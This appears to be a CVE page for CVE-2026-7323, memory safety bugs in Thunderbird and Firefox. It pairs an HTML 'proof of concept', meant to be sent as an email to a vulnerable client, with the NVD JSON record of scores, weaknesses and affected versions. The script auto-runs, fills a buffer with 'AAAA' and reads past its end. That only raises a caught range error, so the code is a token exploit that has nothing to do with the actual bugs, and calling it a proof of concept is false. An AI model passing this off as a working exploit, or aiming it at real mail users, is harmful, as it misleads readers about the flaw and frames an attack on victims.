CVE-2026-7323

<!-- // PoC for CVE-2026-7323 (Memory Corruption in Thunderbird) // This script demonstrates the concept of triggering the vulnerability. // Usage: Send as HTML email to vulnerable Thunderbird client. --> <html> <body> <script> function trigger_vuln() { try { // Simulate memory allocation that leads to corruption var buf = new ArrayBuffer(0x100000); var view = new DataView(buf); // Malicious pattern to overwrite critical memory structures for (var i = 0; i < 0x100000; i += 4) { view.setUint32(i, 0x41414141); // 'AAAA' } // Attempt to trigger the crash/exploit // In a real exploit, this would manipulate the vtable or return address var corrupt = view.getUint32(0x100004); } catch (e) { console.log("[+] Exception caught: " + e.message); } } // Auto-trigger on load window.onload = trigger_vuln; </script> <p>CVE-2026-7323 PoC Test</p> </body> </html>

{"cve": {"id": "CVE-2026-7323", "sourceIdentifier": "[email protected]", "published": "2026-04-28T15:16:37.837", "lastModified": "2026-04-30T18:38:23.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memory safety bugs present in Thunderbird ESR 140.10.0 and Thunderbird 150.0.0. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, Thunderbird 150.0.1, and Thunderbird 140.10.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.10.1", "matchCriteriaId": "0772C464-37C8-4124-AAFC-66D7C1BEA6DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0.1", "matchCriteriaId": "2256A965-6FB9-464D-9A25-F6DA1811686D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.10.1", "matchCriteriaId": "1E82C76E-35A0-4513-A8A8-D20DAF8C7F4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0.1", "matchCriteriaId": "C52D9F1F-104D-4A17-97C0-E4AA35DEF2AB"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/buglist.cgi?bug_id=2028537%2C2029911%2C2031121%2C2033602", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-35/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-36/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-38/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-39/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}